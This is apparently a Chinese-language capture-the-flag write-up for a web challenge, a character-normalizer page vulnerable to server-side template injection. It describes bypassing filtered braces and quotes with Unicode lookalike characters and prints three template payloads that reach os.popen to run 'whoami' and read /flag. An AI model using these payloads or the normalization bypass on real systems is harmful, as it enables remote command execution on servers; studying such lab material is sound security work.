点进页面可以发现是一个字符规范器,里面原本就带有一句Leonardo,但是可以发现输入参数是特殊字符,输出了正常字符。
知道是SSIT,测试payload发现过滤了英文的{},'',",
通过一开始的字符规范猜测可以用其他的,遂上网搜。
发现果然可行
对单引号也修改
构造payload:
︷︷config.__class__.__init__.__globals__︸︸
︷︷config.__class__.__init__.__globals__['os'].popen('whoami').read()︸︸
︷︷config.__class__.__init__.__globals__['os'].popen('cat /flag').read()︸︸
